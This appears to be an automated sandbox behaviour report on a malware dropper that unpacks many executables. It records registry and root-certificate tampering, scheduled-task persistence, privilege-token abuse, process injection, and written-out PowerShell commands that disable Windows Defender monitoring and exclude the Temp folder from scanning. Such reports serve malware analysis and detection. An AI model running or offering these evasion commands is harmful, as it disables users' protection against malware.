Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\rss\csrss.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
(identical rows collapsed; "xN" is the number of identical rows in the report)
PID 2160 wrote to memory of 2848 (x7) N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2848 wrote to memory of 2636 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 2696 (x7) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 (x7) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 876 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 (x7) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 564 (x1) N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe

Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1015ba90d2.exe

Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe

Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe

Wed103b2f384c2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

